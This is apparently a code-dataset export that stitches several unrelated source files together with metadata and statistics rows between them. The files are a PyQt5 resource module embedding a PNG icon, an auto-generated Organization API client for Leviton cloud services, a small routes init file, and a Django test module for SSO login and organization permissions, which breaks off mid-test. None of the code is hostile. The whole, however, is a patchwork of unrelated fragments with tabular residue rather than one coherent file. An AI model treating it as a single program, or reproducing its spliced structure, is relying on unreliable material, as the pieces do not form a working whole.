07eedb01e2081207a940ff87bba2b6d67f916a7b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.11.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x02\x1e\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x06\x00\x00\x00\xe0\x77\x3d\xf8\
\x00\x00\x00\x04\x73\x42\x49\x54\x08\x08\x08\x08\x7c\x08\x64\x88\
\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\
\x01\x95\x2b\x0e\x1b\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\
\x74\x77\x61\x72\x65\x00\x77\x77\x77\x2e\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x2e\x6f\x72\x67\x9b\xee\x3c\x1a\x00\x00\x01\x9b\x49\x44\
\x41\x54\x48\x89\xed\xd4\x3b\x6b\x14\x61\x14\xc6\xf1\xdf\xbb\xbb\
\x23\x42\x04\x83\x41\x1b\x11\xc1\xc6\x42\x10\x41\x45\x31\x45\xd2\
\x88\x36\x16\x16\xe6\x03\x58\x2a\xb6\xb6\x46\x11\x6b\x6f\x95\x1f\
\x21\x7e\x00\x89\x82\x3b\xf1\x06\x81\x40\x10\x3b\x6d\x24\x22\x9a\
\x34\x22\x01\x03\xd9\xec\x1e\x8b\x2c\x6e\x76\x67\x6f\x4a\x3a\xf3\
\x1f\x5e\x98\x77\xe6\x3c\xe7\x39\xe7\xcc\x85\x1d\x06\x90\xb6\x6e\
\x62\x46\xd9\x11\xa5\x42\xd0\x29\xb5\x6e\xe2\x98\x2e\xc6\xba\x25\
\x52\x12\xdd\x0d\x72\x3f\x30\xd2\xa5\x8c\x33\x69\xc2\x62\x5b\xec\
\xac\x03\x32\xa7\x0b\xb1\x25\xeb\x69\xd2\x8b\xd6\xb6\x9d\x51\x64\
\x6d\x2b\xb9\xd7\x99\x1c\xd2\x05\x2b\xca\x96\xa4\x8e\xa3\x21\x6b\
\xf7\xeb\xcf\xb3\x34\x61\xba\xd7\xcd\x34\xe1\x83\xf0\xa5\x5f\x82\
\x7e\x06\x81\x8b\x91\xbb\xd1\x33\xa0\x6a\x8f\x92\x7d\x7f\x6f\x90\
\xdc\x96\xfe\x24\x7e\x10\x55\xd7\x0b\xc9\xe7\x8d\x09\xe3\xc2\x88\
\xe4\xa7\x4a\xf7\x4e\x2a\x85\xaa\xc3\x9d\x34\xb9\x39\x96\xc8\x05\
\x1e\x4b\x1e\x45\x55\xa6\xec\x95\x9a\x65\xaf\x7d\xb3\xe6\xb8\x24\
\xc3\x77\x2b\x16\xd3\x94\x7a\xcc\x69\xa8\x3b\xd4\xb3\x9d\xa8\x3a\
\x51\xb8\x96\xbb\x16\xb9\x46\xe4\xa2\xb9\xea\x91\x7b\x18\x55\xa3\
\xf1\xd2\xd1\x88\xd6\x9b\x18\xa4\x98\x37\xd6\x3e\x8c\x01\xc4\x8c\
\xb2\xfd\xbe\x4a\x96\x84\x9b\x4a\xc6\x85\xbb\x98\x4a\x93\x9e\x0e\
\xd2\x0f\x24\xde\x3a\xdc\xac\xfc\xf2\x96\xae\x3e\x47\xd5\xfd\x61\
\xf4\x9d\xcf\xa0\xc8\xba\x65\xc9\x2a\xae\xc4\xac\xe7\x32\x67\x71\
\x50\xc9\xa7\x61\x0c\x06\x8e\x08\x62\xce\x55\x0d\x4f\x6c\xfe\x02\
\x2a\x78\x67\xd5\xf9\x74\xc9\xaf\x6d\x31\x80\x78\xe3\x98\x9a\xf7\
\x4a\x1a\x32\x7b\xd3\x39\x6b\xc3\xe8\x06\x7d\xc9\x2d\x76\xfb\x28\
\x69\x08\xec\xb2\x31\xac\x6c\x78\x83\x7f\xe4\x7f\x32\x38\x69\x03\
\x0b\x58\x68\x9e\xef\xb0\x3d\xfc\x06\x6c\x26\x87\xc2\x29\x84\x98\
\x3a\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x0e\
\x0f\xad\x61\xa8\
\x00\x49\
\x00\x6d\x00\x50\x00\x61\x00\x63\x00\x74\x00\x5f\x00\x74\x00\x6f\x00\x6f\x00\x6c\x00\x62\x00\x6f\x00\x78\
\x00\x08\
\x0a\x61\x5a\xa7\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x76\xe2\xd6\x9b\x60\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 41.714286
| 106
| 0.708904
| 883
| 4,088
| 3.238958
| 0.301246
| 0.228671
| 0.22972
| 0.172028
| 0.206643
| 0.206643
| 0.183217
| 0.183217
| 0.183217
| 0.183217
| 0
| 0.31319
| 0.068982
| 4,088
| 97
| 107
| 42.14433
| 0.438255
| 0.037182
| 0
| 0.135802
| 0
| 0.555556
| 0.000261
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.024691
| false
| 0
| 0.012346
| 0
| 0.037037
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c27071b2c8b75a462d679f66d02df4a579fa0c8
| 20,888
|
py
|
Python
|
decora_wifi/models/organization.py
|
7ooL/api_decora
|
6a92a2d20c47e5b10702778255a863643cca3665
|
[
"MIT"
] | null | null | null |
decora_wifi/models/organization.py
|
7ooL/api_decora
|
6a92a2d20c47e5b10702778255a863643cca3665
|
[
"MIT"
] | null | null | null |
decora_wifi/models/organization.py
|
7ooL/api_decora
|
6a92a2d20c47e5b10702778255a863643cca3665
|
[
"MIT"
] | null | null | null |
# Leviton Cloud Services API model Organization.
# Auto-generated by api_scraper.py.
#
# Copyright 2017 Tim Lyakhovetskiy <tlyakhov@gmail.com>
#
# This code is released under the terms of the MIT license. See the LICENSE
# file for more details.
from ..base_model import BaseModel
class Organization(BaseModel):
def __init__(self, session, model_id=None):
super(Organization, self).__init__(session, model_id)
def add_person(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/addPerson".format(self._id)
return self._session.call_api(api, attribs, 'post')
def cancel_subscription(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/cancelSubscription".format(self._id)
return self._session.call_api(api, attribs, 'post')
@classmethod
def count(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/count"
return session.call_api(api, attribs, 'get')
def count_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
@classmethod
def create(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
return session.call_api(api, attribs, 'post')
def create_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers".format(self._id)
return self._session.call_api(api, attribs, 'post')
@classmethod
def create_many(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
return session.call_api(api, attribs, 'post')
def create_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules".format(self._id)
return self._session.call_api(api, attribs, 'post')
def delete_by_id(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_holidays(self, holiday_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/{1}".format(self._id, holiday_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_invitations(self, invitation_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/{1}".format(self._id, invitation_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_locations(self, location_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/{1}".format(self._id, location_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_management_tiers(self, management_tier_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/{1}".format(self._id, management_tier_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/{1}".format(self._id, person_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_permissions(self, permission_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/{1}".format(self._id, permission_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_schedules(self, schedule_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/{1}".format(self._id, schedule_id)
return self._session.call_api(api, attribs, 'delete')
def exists(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/exists".format(self._id)
return self._session.call_api(api, attribs, 'get')
def exists_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/rel/{1}".format(self._id, person_id)
return self._session.call_api(api, attribs, 'head')
@classmethod
def find(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
items = session.call_api(api, attribs, 'get')
result = []
if items is not None:
for data in items:
model = Organization(session, data['id'])
model.data = data
result.append(model)
return result
def find_by_id(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}".format(self._id)
data = self._session.call_api(api, attribs, 'get')
self.data.update(data)
return self
def find_by_id_holidays(self, holiday_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/{1}".format(self._id, holiday_id)
return self._session.call_api(api, attribs, 'get')
def find_by_id_invitations(self, invitation_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/{1}".format(self._id, invitation_id)
data = self._session.call_api(api, attribs, 'get')
from .invitation import Invitation
model = Invitation(self._session, data['id'])
model.data = data
return model
def find_by_id_locations(self, location_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/{1}".format(self._id, location_id)
data = self._session.call_api(api, attribs, 'get')
from .location import Location
model = Location(self._session, data['id'])
model.data = data
return model
def find_by_id_management_tiers(self, management_tier_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/{1}".format(self._id, management_tier_id)
data = self._session.call_api(api, attribs, 'get')
from .management_tier import ManagementTier
model = ManagementTier(self._session, data['id'])
model.data = data
return model
def find_by_id_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/{1}".format(self._id, person_id)
data = self._session.call_api(api, attribs, 'get')
from .person import Person
model = Person(self._session, data['id'])
model.data = data
return model
def find_by_id_permissions(self, permission_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/{1}".format(self._id, permission_id)
data = self._session.call_api(api, attribs, 'get')
from .permission import Permission
model = Permission(self._session, data['id'])
model.data = data
return model
def find_by_id_schedules(self, schedule_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/{1}".format(self._id, schedule_id)
return self._session.call_api(api, attribs, 'get')
@classmethod
def find_one(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/findOne"
return session.call_api(api, attribs, 'get')
@classmethod
def generate_subscription_report(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/generateSubscriptionReport"
return session.call_api(api, attribs, 'post')
def refresh(self):
api = "/Organizations/{0}".format(self._id)
result = self._session.call_api(api, {}, 'get')
if result is not None:
self.data.update(result)
return self
def get_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays".format(self._id)
return self._session.call_api(api, attribs, 'get')
def get_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .invitation import Invitation
result = []
if items is not None:
for data in items:
model = Invitation(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .location import Location
result = []
if items is not None:
for data in items:
model = Location(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .management_tier import ManagementTier
result = []
if items is not None:
for data in items:
model = ManagementTier(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .person import Person
result = []
if items is not None:
for data in items:
model = Person(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .permission import Permission
result = []
if items is not None:
for data in items:
model = Permission(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules".format(self._id)
return self._session.call_api(api, attribs, 'get')
def get_subscription_plan(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/subscriptionPlan".format(self._id)
return self._session.call_api(api, attribs, 'get')
def link_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/rel/{1}".format(self._id, person_id)
data = self._session.call_api(api, attribs, 'put')
from .person import Person
model = Person(self._session, data['id'])
model.data = data
return model
def remove_person(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/removePerson".format(self._id)
return self._session.call_api(api, attribs, 'post')
def replace_by_id(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/replace".format(self._id)
return self._session.call_api(api, attribs, 'post')
@classmethod
def replace_or_create(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/replaceOrCreate"
return session.call_api(api, attribs, 'post')
def subscribe_to_plan(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/subscribeToPlan".format(self._id)
return self._session.call_api(api, attribs, 'post')
def unlink_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/rel/{1}".format(self._id, person_id)
return self._session.call_api(api, attribs, 'delete')
@classmethod
def update_all(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/update"
return session.call_api(api, attribs, 'post')
def update_attributes(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}".format(self._id)
data = self._session.call_api(api, attribs, 'put')
self.data.update(attribs)
return self
def update_by_id_holidays(self, holiday_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/{1}".format(self._id, holiday_id)
return self._session.call_api(api, attribs, 'put')
def update_by_id_invitations(self, invitation_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/{1}".format(self._id, invitation_id)
data = self._session.call_api(api, attribs, 'put')
from .invitation import Invitation
model = Invitation(self._session, data['id'])
model.data = data
return model
def update_by_id_locations(self, location_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/{1}".format(self._id, location_id)
data = self._session.call_api(api, attribs, 'put')
from .location import Location
model = Location(self._session, data['id'])
model.data = data
return model
def update_by_id_management_tiers(self, management_tier_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/{1}".format(self._id, management_tier_id)
data = self._session.call_api(api, attribs, 'put')
from .management_tier import ManagementTier
model = ManagementTier(self._session, data['id'])
model.data = data
return model
def update_by_id_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/{1}".format(self._id, person_id)
data = self._session.call_api(api, attribs, 'put')
from .person import Person
model = Person(self._session, data['id'])
model.data = data
return model
def update_by_id_permissions(self, permission_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/{1}".format(self._id, permission_id)
data = self._session.call_api(api, attribs, 'put')
from .permission import Permission
model = Permission(self._session, data['id'])
model.data = data
return model
def update_by_id_schedules(self, schedule_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/{1}".format(self._id, schedule_id)
return self._session.call_api(api, attribs, 'put')
@classmethod
def upsert(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
data = session.call_api(api, attribs, 'put')
model = Organization(session, data['id'])
model.data = data
return model
@classmethod
def upsert_with_where(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/upsertWithWhere"
return session.call_api(api, attribs, 'post')
| 35.890034
| 91
| 0.606281
| 2,462
| 20,888
| 4.978067
| 0.048741
| 0.071802
| 0.083388
| 0.101257
| 0.926811
| 0.925098
| 0.918326
| 0.914572
| 0.89393
| 0.889034
| 0
| 0.005999
| 0.273841
| 20,888
| 581
| 92
| 35.951807
| 0.802017
| 0.011059
| 0
| 0.780335
| 1
| 0
| 0.119576
| 0.096813
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154812
| false
| 0
| 0.035565
| 0
| 0.345188
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c2cb8e49b96fe48c28fbd234c1b58fd0fec13be
| 58
|
py
|
Python
|
app/routes/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | 2
|
2021-02-15T21:02:12.000Z
|
2021-10-14T19:05:34.000Z
|
app/routes/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
app/routes/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
from app.routes.api import *
from app.routes.page import *
| 29
| 29
| 0.775862
| 10
| 58
| 4.5
| 0.6
| 0.311111
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12069
| 58
| 2
| 29
| 29
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c687875cc68d1f377808ccf608076fc58094fbc
| 10,254
|
py
|
Python
|
mc2/tests/test_sso.py
|
praekeltfoundation/mc2
|
5367a8aed309fade0f17bc72efa099b0afc76aa7
|
[
"BSD-2-Clause"
] | 4
|
2016-03-09T00:51:17.000Z
|
2017-10-05T23:54:00.000Z
|
mc2/tests/test_sso.py
|
praekeltfoundation/mc2
|
5367a8aed309fade0f17bc72efa099b0afc76aa7
|
[
"BSD-2-Clause"
] | 131
|
2015-11-19T16:45:23.000Z
|
2018-07-24T09:36:08.000Z
|
mc2/tests/test_sso.py
|
praekeltfoundation/mc2
|
5367a8aed309fade0f17bc72efa099b0afc76aa7
|
[
"BSD-2-Clause"
] | 2
|
2016-07-30T15:36:23.000Z
|
2017-09-18T12:40:11.000Z
|
from django.test import TestCase, Client
from django.contrib.auth.models import User
from mc2 import permissions
from mc2.organizations.models import Organization, OrganizationUserRelation
from mc2.controllers.docker.models import DockerController
import pytest
@pytest.mark.django_db
class LoginTest(TestCase):
def test_email_login_successful(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.get('/')
self.assertRedirects(response, '/login/?next=/')
response = client.post(
'/login/?next=/', {'username': user.username, 'password': '1234'})
self.assertRedirects(response, '/')
def test_email_login_unsuccessful(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.get('/')
self.assertRedirects(response, '/login/?next=/')
response = client.post(
'/login/?next=/', {'username': user.username, 'password': '123'})
self.assertContains(response, 'name or password is not correct')
def test_email_login_sso(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.get(
'/login?service=http%3A%2F%2Ftestapp.com%2F'
'admin%2Flogin%2F%3Fnext%3D%252Fadmin%252F')
self.assertContains(response, 'Welcome to Mission Control')
response = client.post(
('/login?service=http%3A%2F%2Ftestapp.com%2F'
'admin%2Flogin%2F%3Fnext%3D%252Fadmin%252F'),
{'username': user.username, 'password': '1234'})
self.assertEquals(
response.request.get('QUERY_STRING'),
('service=http%3A%2F%2Ftestapp.com%2Fadmin%2Flogin'
'%2F%3Fnext%3D%252Fadmin%252F'))
def test_login_sso_redirects_to_home_when_no_service(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.post(
('/login?service=None'),
{'username': user.username, 'password': '1234'}, follow=True)
self.assertRedirects(response, '/')
@pytest.mark.django_db
class CustomAttributesTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'test@email.com', '1234')
self.client = Client()
def test_group_access(self):
user = User.objects.create(first_name='foo')
attr = permissions.org_permissions(user, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
def test_user_details(self):
user = User.objects.create(first_name='foo', email='foo@email.com')
attr = permissions.org_permissions(user, 'http://foobar.com/')
self.assertEqual(attr['givenName'], 'foo')
self.assertEqual(attr['email'], 'foo@email.com')
def test_org_admin_must_have_superuser_access(self):
user = User.objects.create_user('joe', 'joe@email.com', '1234')
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=user, organization=org, is_admin=True)
DockerController.objects.create(
name='my test app', organization=org,
owner=user, domain_urls='foobar.com')
self.client.login(username='joe', password='1234')
attr = permissions.org_permissions(user, 'http://foobar1.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(user, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
def test_super_user_must_have_super_user_access(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
joe = User.objects.create_superuser('joe', 'joe@email.com', '1234')
self.client.login(username='joe', password='1234')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
def test_user_in_org_must_have_access(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, domain_urls='test-app.molo.site my.domain.com')
# joe is a normal user in the org (is_admin = False)
joe = User.objects.create_user('joe', 'joe@email.com', '1234')
OrganizationUserRelation.objects.create(
user=joe, organization=org)
# create the controller as testuser
self.client.login(username='testuser', password='1234')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
def test_app_admin_user_in_org_must_have_admin_access_for_the_app(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, domain_urls='test-app.molo.site my.domain.com')
# joe is an app admin user in the org (is_app_admin = True)
joe = User.objects.create_user('joe', 'joe@email.com', '1234')
OrganizationUserRelation.objects.create(
user=joe, organization=org, is_app_admin=True)
# create the controller as testuser
self.client.login(username='testuser', password='1234')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
def test_user_in_other_org_must_not_have_cross_access(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
# joe is a normal user in the org (is_admin = False)
joe = User.objects.create_user('joe', 'joe@email.com', '1234')
OrganizationUserRelation.objects.create(
user=joe, organization=org)
DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, domain_urls='foobar.com')
# sam is a normal user in other org
sam = User.objects.create_user('sam', 'sam@email.com', '1234')
other_org = Organization.objects.create(name='Other', slug='other')
OrganizationUserRelation.objects.create(
user=sam, organization=other_org)
DockerController.objects.create(
name='my test app', organization=other_org,
owner=self.user, domain_urls='test-app.molo.site')
